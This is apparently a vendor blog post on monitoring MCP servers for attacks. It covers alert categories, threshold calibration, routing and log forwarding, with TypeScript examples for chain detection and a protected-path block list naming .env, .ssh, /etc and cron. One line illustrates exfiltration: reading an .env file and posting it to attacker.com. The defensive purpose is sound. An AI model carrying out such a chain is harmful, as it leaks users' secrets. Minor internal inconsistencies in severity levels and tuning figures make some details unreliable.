Engineering · Observability · Security

MCP Server Security Monitoring and Alerting: What to Alert On, Threshold Calibration, and How to Avoid Alert Fatigue

Most MCP servers log nothing beyond a startup message. The ones that do log usually emit raw error stacks — the wrong signal for security operations. Here is a practical framework: four alert categories, how to calibrate thresholds against real traffic, how to route alerts to the right team, and what SkillAudit checks when it grades your observability posture.

Published 2026-06-14 · 3,400 words · ← All posts

Why MCP monitoring is different from API monitoring

Traditional API monitoring focuses on latency, error rate, and throughput. These metrics tell you when something is broken. MCP server security monitoring needs to answer a different question: is the server being used in ways its authors didn't intend?

Two properties make MCP servers unusual from a monitoring perspective:

1. The caller is an LLM agent, not a human. A human clicking a UI generates ~1–5 API calls per interaction. An LLM agent planning a multi-step task can generate 50–200 tool calls in a single session. Burst traffic that looks like an attack in a traditional API may be a normal agentic loop. Your thresholds need to account for this.

2. Tool calls compose into emergent behaviors. A single call to read_file is benign. A single call to fetch_url is benign. A sequence of read_file(.env) → fetch_url(attacker.com, body=file_content) is a data exfiltration attack — but no individual call raises an alarm if you only look at calls in isolation. Security monitoring for MCP servers must track sessions and sequences, not just individual requests.

The SkillAudit observability axis checks for three things: whether structured security events are emitted (not just generic errors), whether the log format is injection-safe (JSON, not string concatenation), and whether logs are forwarded to an append-only external sink rather than staying on the same host being audited. Servers with no structured logging default to a MEDIUM finding on the observability sub-score.

The four alert categories

Start with four categories. Every alert in your MCP server should map to one of them. If it doesn't, question whether it belongs in a security alert at all.

Category 1

Authentication and authorization failures

Failed token validation, expired credentials, IDOR attempts — signals that an entity is trying to access something it shouldn't

Auth failures are the most reliable security signal because they represent a hard system boundary being tested. Every failed auth check should emit a structured event with: caller identity (or the value that was presented as identity if verification failed), the tool being requested, the resource being accessed, the specific failure reason (expired, missing, invalid format, revoked), and the caller's session state (first failure or Nth in a window).

Alert thresholds:

P0 (page immediately): 3 auth failures from the same caller within 30 seconds — this is credential stuffing or a replay attack
P1 (alert within 5 minutes): Any IDOR attempt — a caller accessing a resource with a valid token but for a different caller's resource ID
P2 (batch to daily digest): Isolated single auth failures — likely a misconfigured client, not an attack

// Structured auth failure event
log.security({
  event: 'auth_failure',
  reason: 'token_expired',           // expired | missing | invalid | revoked | idor
  callerId: hash(presentedCallerId), // hashed — never log raw bearer token
  toolRequested: 'read_file',
  resourceId: args.path,
  sessionFailureCount: session.authFailures,
  sessionAge: Date.now() - session.startedAt,
  ts: Date.now()
});

The IDOR case deserves special handling. When a caller presents a valid token but the resource ID belongs to a different caller, log the resource owner's hashed ID (not their raw identifier) alongside the caller's hashed ID. This creates a correlation path for incident investigation without logging PII in the alert.

Category 2

Anomalous tool call patterns

Tool call sequences that deviate from normal agentic behavior — burst patterns, cross-category chains, off-hours activity

This is the hardest category to calibrate because "anomalous" depends on what normal looks like for your server. But four pattern classes are reliable signals across most MCP servers:

Burst detection: More than N calls of the same tool within T seconds from the same caller. The challenge is that LLM agents legitimately generate bursts during planning loops. The key differentiator is whether the burst contains unique arguments or the same argument repeated. A planning loop calling list_directory 10 times with different paths is normal. The same call 10 times with the same path is a loop bug or a probe.

Cross-category chain detection: A retrieval tool followed immediately by an external-network tool is the canonical exfiltration chain signature. Detecting it requires tagging each tool with its effect class (retrieval / mutation / external) and maintaining a per-session call log. The chain [retrieval, retrieval, external] within a 30-second window should trigger a P1 alert unless the caller has explicitly scoped the allow:retrieval-to-external-chain permission.

Off-hours activity: If your users are internal and primarily work 9–5, a cluster of tool calls at 3 AM is suspicious. This is easy to alert on but requires knowing your traffic baseline. Do not enable this alert until you have two weeks of normal traffic data.

Tool enumeration: A caller that invokes every tool your server exposes exactly once, in quick succession, is probing your surface. This is a reconnaissance pattern. The signature: N distinct tools called within 60 seconds with minimal arguments — args that look like the minimum required to avoid a validation error rather than real use.

// Cross-category chain detection
function isExfiltrationPattern(callLog: ToolCall[]): boolean {
  const recent = callLog.filter(c => Date.now() - c.ts < 30_000);
  const hasRetrieval = recent.some(c => c.effectClass === 'retrieval');
  const hasExternal  = recent.some(c => c.effectClass === 'external');
  const hasMutation  = recent.some(c => c.effectClass === 'mutation');
  // retrieval + external with no mutation = potential exfiltration
  return hasRetrieval && hasExternal && !hasMutation;
}

// Run after each tool call that completes successfully
if (isExfiltrationPattern(session.callLog)) {
  log.security({
    event: 'chain_guard_alert',
    pattern: 'retrieval_to_external',
    callSequence: session.callLog.slice(-10).map(c => c.tool),
    ts: Date.now()
  });
}

Category 3

Data volume and exfiltration signals

High-volume read operations, large response payloads, and external-network calls that correlate with retrieval spikes

Tool call count alone doesn't capture exfiltration risk — a server that returns 1 KB per call is different from one that streams multi-MB files. Volume-based alerts add a second axis that catches exfiltration attempts that stay under call-count thresholds by requesting large payloads instead of many calls.

Track three volume metrics per session:

Cumulative response bytes: Total bytes returned to the caller across all tool calls in the session. Alert if this exceeds your 99th-percentile session byte volume (establish this from baseline traffic — for most MCP servers serving LLM agents, it will be 1–10 MB per session).
Single-call response size: If one tool call returns more than your configured ceiling (e.g., 5 MB), alert regardless of session total. A single read_file call that returns 5 MB of data is almost certainly reading the wrong file or responding to an oversized argument.
External call byte volume: Total bytes sent in outbound requests from tools that make external network calls. A small inbound query producing a large outbound payload is a classic exfiltration indicator.

class SessionVolumeGuard {
  private inboundBytes = 0;
  private outboundBytes = 0;
  private readonly INBOUND_CEILING = 10 * 1024 * 1024;  // 10 MB
  private readonly OUTBOUND_CEILING = 1 * 1024 * 1024;  // 1 MB

  recordResponse(toolName: string, responseBytes: number) {
    this.inboundBytes += responseBytes;
    if (responseBytes > 5 * 1024 * 1024) {
      log.security({ event: 'large_single_response', tool: toolName, bytes: responseBytes, ts: Date.now() });
    }
    if (this.inboundBytes > this.INBOUND_CEILING) {
      log.security({ event: 'session_volume_ceiling', totalBytes: this.inboundBytes, ts: Date.now() });
    }
  }

  recordOutbound(toolName: string, bodyBytes: number) {
    this.outboundBytes += bodyBytes;
    if (this.outboundBytes > this.OUTBOUND_CEILING) {
      log.security({ event: 'outbound_volume_ceiling', tool: toolName, totalBytes: this.outboundBytes, ts: Date.now() });
    }
  }
}

Volume alerts have a high false-positive rate in servers that legitimately process large files. Before enabling the session ceiling alert, collect a week of production response-size data and set the threshold at the 99th percentile plus 50% headroom. This approach catches true anomalies while suppressing the daily heavy-user traffic that will otherwise dominate your alert queue.

Category 4

Configuration and filesystem tampering signals

Write operations on sensitive paths, permission scope escalation, and server configuration changes at runtime

If your MCP server exposes any write tools — filesystem, database, message queue — those write operations are the highest-risk surface in your server. Most write tools legitimately write to application data paths. The sensitive cases are writes to infrastructure-level paths that the tool wasn't designed to touch.

Define a set of protected path patterns per tool. Any write to a protected pattern should emit a P1 alert and be blocked before the write completes:

const PROTECTED_PATH_PATTERNS = [
  /\.env/,           // environment files
  /\.git\//,         // git internals
  /\.ssh\//,         // SSH keys
  /\/etc\//,         // system config
  /\.github\//,      // CI/CD workflows
  /cron/i,           // cron job files
  /\.(sh|bash|zsh|py|rb)$/, // executable scripts
  /node_modules\//,  // dependency tree
];

function isProtectedPath(path: string): boolean {
  return PROTECTED_PATH_PATTERNS.some(p => p.test(path));
}

// In write_file handler — check before any write
if (isProtectedPath(args.path)) {
  log.security({
    event: 'write_to_protected_path',
    path: args.path,              // log the path — not the content
    callerId: session.callerId,
    ts: Date.now()
  });
  throw new ToolError('FORBIDDEN', 'Write target is not allowed');
}

The block-before-write pattern matters here. Log the attempt and throw before touching the filesystem. An alert that fires after the write has succeeded is observability, not security.

A second class of tampering signal applies if your server exposes any tool that modifies its own configuration — changing rate limits, updating allowed scopes, adjusting feature flags. These operations should always require a second authentication factor beyond the standard session token (a separate admin token or an explicit confirmation parameter) and always emit a P1 alert.

Threshold calibration: how to find the right numbers

Alert thresholds are where most MCP server monitoring programs fail. Thresholds set too low create an alert storm that on-call engineers learn to ignore. Thresholds set too high miss real attacks. The right approach is data-driven calibration from your own baseline, not numbers from a blog post.

Step 1 — Establish a baseline (2 weeks minimum)

Deploy structured logging for a fortnight before enabling any alerts. Log every tool call with: caller ID hash, tool name, response bytes, latency, session age. Do not alert on anything during this period. You are building the histogram of normal behavior.

Step 2 — Calculate percentile thresholds

For each metric you plan to alert on, compute p99 from the baseline. Your alert threshold = p99 × 1.5. The 1.5× headroom absorbs legitimate traffic spikes (Monday morning rush, a large automated workflow) without triggering on noise.

Step 3 — Segment by caller type

LLM agents generate dramatically more traffic than human-driven integrations. If you can distinguish caller types (by token claim, by client identifier in the auth header, by call-rate signature), use per-segment thresholds. A threshold calibrated on mixed traffic will be too high for humans and too low for agents.

Step 4 — Review and halve after 30 days

After your first 30 days of production alerts, audit the false-positive rate. If more than 20% of P1 alerts resolve as false positives, your thresholds are too sensitive — raise them by 25%. If you have zero P1 alerts and no incidents, your thresholds may be too high — lower by 25%. Re-tune every 30 days until your false-positive rate is under 10%.

Alert routing: who gets what

An alert that pages the wrong person, or pages everyone, will be ignored. Map alert severity to team before you deploy monitoring:

Severity	Alert category	Route to	SLA
P0	Auth failure burst (≥3 failures in 30s from same caller)	On-call security engineer + server owner	15 minutes to acknowledge
P0	Write to protected path (blocked)	On-call security engineer + server owner	15 minutes to acknowledge
P1	Cross-category chain alert (retrieval → external without chain scope)	Server owner + security team Slack channel	4 hours to investigate
P1	IDOR attempt (valid token, wrong resource)	Server owner + security team Slack channel	4 hours to investigate
P1	Session byte ceiling exceeded	Server owner	4 hours to investigate
P2	Tool enumeration pattern	Security team daily digest	24 hours
P2	Off-hours activity	Security team daily digest	24 hours
INFO	Single auth failure	Log only — no alert	Review in weekly report

Alert fatigue is a security vulnerability. If your on-call rotation is receiving more than 5 P1 alerts per day that resolve as false positives, the alert program is producing negative security value — engineers stop looking, and real attacks get lost in noise. Track your false-positive rate as a first-class metric and treat a high false-positive rate as a P2 incident.

Integration with SIEM and incident response

Structured JSON logs are useful on their own, but they become powerful when forwarded to a SIEM (Splunk, Elastic Security, Datadog SIEM, or an open-source alternative like Wazuh). The structured log schema from earlier in this post is designed to be SIEM-friendly: every event has a consistent event field for filtering, a consistent ts field for time-series analysis, and hashed identifiers for correlation without PII.

Three SIEM use cases that are worth wiring up immediately:

Correlation across multiple MCP servers: If your infrastructure includes multiple MCP servers, a single SIEM receiving logs from all of them can detect attacks that hop between servers — a caller that fails auth on Server A and immediately tries Server B with the same credential is a credential-stuffing attack across your entire fleet, invisible if you only look at per-server logs.

Retrospective investigation: After an incident, you need to answer "what did this caller do in the 30 minutes before the alert fired?" SIEM with structured logs answers this in seconds. A server that only logs to stdout with raw error messages answers it in hours of log parsing, if at all.

Baseline drift detection: SIEM can build a rolling model of normal tool call patterns per caller and alert when a caller's behavior diverges significantly from their own baseline — a more precise signal than fixed thresholds for high-volume callers whose usage patterns are complex.

Log forwarding that survives an incident

One detail that matters operationally: if your logs are stored only on the MCP server's own host, an attacker who compromises the server can delete the logs before your investigation begins. Forward logs to an append-only external sink from the moment they are written. The standard pattern:

import pino from 'pino';
import pinoms from 'pino-multi-stream';

// Two streams: local file (for debug) + external append-only sink
const streams = pinoms.multistream([
  { stream: process.stdout },
  {
    stream: pinoCloudWatch({
      logGroupName: '/mcp-server/security',
      logStreamName: `security-${process.env.INSTANCE_ID}`,
      // CloudWatch Logs enforces append-only via IAM — no delete permission for the server role
    })
  }
]);

export const log = {
  security: (event: SecurityEvent) => streams.write(JSON.stringify({ level: 'security', ...event }) + '\n')
};

The CloudWatch example works for AWS deployments. For other environments: Loki with an append-only log pipeline, an S3 bucket with object lock enabled, or a managed SIEM ingestion endpoint — any option where the server process does not have delete or overwrite access to its own log store.

The three common mistakes

Mistake 1: Logging in the error handler only. If your only security events come from exception handlers, you miss the majority of attack patterns — most successful tool chaining attacks and data exfiltration attempts complete without throwing exceptions. Security events should be emitted after successful calls that match anomaly patterns, not only on failure.

Mistake 2: Including credential values in logs. The most common credential leak in MCP servers is a console.log(process.env) or an error message that includes the full token value. Security event logs should contain hashed caller IDs and argsHash (a SHA-256 of the arguments for correlation) but never the raw argument values, never the raw token, and never env-var values. See the anatomy of a credential leak post for a census of how this goes wrong across the community corpus.

Mistake 3: Alerting on every anomaly equally. Not every alert deserves a page. A server that pages on every single auth failure will create an alert storm every time a client has a stale token. Tiered severity (P0/P1/P2/INFO) with appropriate routing for each tier is what makes alert programs sustainable. Build the tiers before you enable any alerts in production.

What a monitoring-ready server looks like

After implementing the framework above, a monitoring-ready MCP server has these properties:

Every security-relevant event emits a structured JSON log line with event, ts, hashed caller ID, and relevant context — no raw error strings, no credential values
Auth failures, chain guard blocks, protected-path write attempts, and volume ceiling breaches each have a named event type that maps to an alert rule
A per-session call log tracks tool sequence and effect class for chain detection
Alert thresholds are calibrated from baseline traffic, not from a blog post
Logs forward to an append-only external sink that the server process cannot delete
Alert routing is documented: P0 pages on-call within 15 minutes, P1 alerts the team channel within 4 hours, P2 batches to a daily digest

SkillAudit grade impact

The SkillAudit observability sub-score currently contributes to the Security axis. Here is how the monitoring patterns in this post map to findings and grade effects:

HIGH

No structured security event logging at all — tool calls complete with no audit trail. Grade impact: −15 on Security axis. Fix: add the structured event schema from this post to at least auth_failure and chain_guard_alert events.

MEDIUM

Security events emitted as unstructured strings (console.log or stderr) — not parseable by SIEM. Grade impact: −8 on Security axis. Fix: switch to JSON event objects with consistent field names.

MEDIUM

Security events include raw credential values or full env vars. Grade impact: −10 on Credential Exposure axis. Fix: log argsHash instead of raw args; never log process.env or bearer tokens.

WARN

Logs stored locally only — no external forwarding. Grade impact: −5 on Security axis. Fix: add a pino-cloudwatch / pino-loki stream.

WARN

No chain detection logic — session call log not maintained. Grade impact: −5 on Security axis. Fix: add per-session call log with effect class tagging and chain detection after each successful tool call.

A server that implements the full framework from this post — structured events, chain detection, external forwarding, no credential values in logs — will score between 90 and 100 on the Security axis, assuming it already passes the static checks for SSRF and command injection. Monitoring doesn't fix code vulnerabilities, but it does demonstrate operational maturity that directly affects the Maintenance sub-score as well.

Starting point: the minimum viable monitoring setup

If you are starting from zero and need a realistic first step, this is the minimum viable setup that will move your SkillAudit grade and give you genuine security value:

Add one security logger — a thin wrapper around pino that writes JSON to stdout. No configuration beyond JSON.stringify. Do this first — it is ten lines of code.
Instrument two events — auth_failure and chain_guard_alert. These two events catch the majority of active attacks and have clear semantics. Add them before anything else.
Add one alert rule — page on ≥3 auth failures from the same caller in 30 seconds. Set this up in your existing alerting system (PagerDuty, OpsGenie, Slack alert bot). This is your only P0 alert for the first month.
Forward to one external sink — whatever your existing infrastructure uses (CloudWatch, Datadog, Loki). If you have nothing, a free Datadog trial works for the first 30 days.
Review after 30 days — look at the auth failure events. Are there any callers with repeated failures? Any cross-category chains that fired? Tune the chain detection threshold based on what you see.

Everything else in this post is additive on top of this foundation. The minimum viable setup takes 2–4 hours to implement and will surface real security signals within the first week of production traffic.

Get your MCP server's observability score

SkillAudit checks for structured security event logging, credential safety in logs, and external forwarding as part of every audit. Paste your GitHub URL and see your score in 60 seconds.

Run a free audit →